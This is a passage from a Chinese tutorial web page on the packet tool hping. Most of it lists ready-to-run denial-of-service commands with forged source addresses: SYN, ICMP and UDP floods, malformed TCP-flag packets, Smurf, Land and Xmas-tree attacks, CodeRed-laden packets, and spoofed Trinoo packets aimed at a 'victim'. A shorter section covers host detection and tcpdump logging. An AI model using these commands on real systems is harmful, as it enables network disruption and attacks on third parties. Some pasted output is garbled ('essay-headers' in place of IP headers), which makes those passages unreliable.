网络安全检测|网络安全服务|网络安全扫描-香港墨客投资移动版

主页 > 业界资讯 > 网络安全预防措施

Hping使用方法详解(2)

每秒送1个(-i u1000000)TCP(default)封包到的port 44444,伪造来源IP(-a)100.100.100.100使用的port为22222

hping  –i u1000000 –a 100.100.100.100 –s 22222 –p 44444

SYN Flooding(每秒10个封包)

hping 目标主机IP –i u100000 –S –a 伪造来源IP

伪造IP的ICMP封包(每秒10个封包)

hping 目标主机IP –i u100000 –1 –a 伪造来源IP

注:-1为数字非英文

不正常TCP Flag组合封包(每秒10个封包)

(a)SYN+FIN

hping 目标主机IP –i u100000 –S –F –a 伪造来源IP

(b)X’mas

hping 目标主机IP –i u100000 –F –S –R –P –A –U –a 伪造来源IP

伪造IP的UDP封包

hping 目标主机IP –i u100000 –2 –a 伪造来源IP

伪造IP内含CodeRed封包

hping 目标主机IP –i u100000 –d [封包datasize] –E [filename] –a [伪造来源IP]

SMURF攻击

hping2 -1 -a 192.168.1.5 192.168.1.255

XMAS TREE攻击

hping2 -SFRP 192.168.1.5

LAND攻击

hping2 -k -S -s 25 -p 25 -a 192.168.1.5 192.168.1.5

用tcpdump记录流量

#捕获25000个包,将原始报文转储到dumpfile中cron任务: 5 3 * * * /usr/sbin/tcpdump -c 25000 -w dumpfile -n#查看记录tcpdump -r dumpfile -X -vv

PING失效后的主机检测:

$ping 192.168.2.1PING 192.168.2.1 (192.168.2.1) 56(84) bytes of data. --- 192.168.2.1 ping statistics ---19 packets transmitted, 0 received, 100% packet loss, time 18009ms ------------------------------------------------$hping2 -c 4 -n -i 2 192.168.2.1HPING 192.168.2.1 (eth0 192.168.2.1): NO FLAGS are set, 40 essay-headers + 0 data bytes len=46 ip=192.168.2.1 ttl=64 id=43489 sport=0 flags=RA seq=0 win=0 rtt=1.0 ms len=46 ip=192.168.2.1 ttl=64 id=43490 sport=0 flags=RA seq=1 win=0 rtt=0.6 ms len=46 ip=192.168.2.1 ttl=64 id=43491 sport=0 flags=RA seq=2 win=0 rtt=0.7 ms len=46 ip=192.168.2.1 ttl=64 id=43498 sport=0 flags=RA seq=3 win=0 rtt=0.6 ms --- 192.168.2.1 hping statistic ---4 packets transmitted, 4 packets received, 0% packet loss round-trip min/avg/max = 0.6/0.8/1.0 ms

-c 发送4个报文-n不进行名称解析 -i包发送时间间隔。

好处:即使主机阻塞了ICMP报文,也可以显示主机是否在运行的信息,在关掉ICMP的探测有效!
显示信息解释:len,返回ip报文大小;ttl; id,IP的ID域;sport,源端口,flags,返回的IP报设置的TCP标志 (R:RESET,A:ACK;S:SYN;F:FIN;P:PUSH;U:URGENT);seq:序列号;win:tcp窗口大小;rtt:往返 时,EIGRP似乎有这个设置。

更复杂的实际的例子

step 1:目标主机安装了blackice,它的ip address是ip.add.of.victim
step 2:发起攻击的一台linux 机器,上面安装了hping

执行如下命令#hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a ip.add.of.dnsserverHPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 essay-headers + 4 data bytes --- ip.add.of.victim hping statistic ---5 packets tramitted, 0 packets received, 100% packet loss round-trip min/avg/max = 0.0/0.0/0.0 ms#hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a  ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 essay-headers + 4 data bytes --- ip.add.of.victim hping statistic ---5 packets tramitted, 0 packets received, 100% packet loss round-trip min/avg/max = 0.0/0.0/0.0 ms#hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a  ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 essay-headers + 4 data bytes --- ip.add.of.victim hping statistic ---5 packets tramitted, 0 packets received, 100% packet loss round-trip min/avg/max = 0.0/0.0/0.0 ms

上面的三个命令干了同一件事情,以伪造的ip发送假的trinoo攻击数据包.

(责任编辑:admin)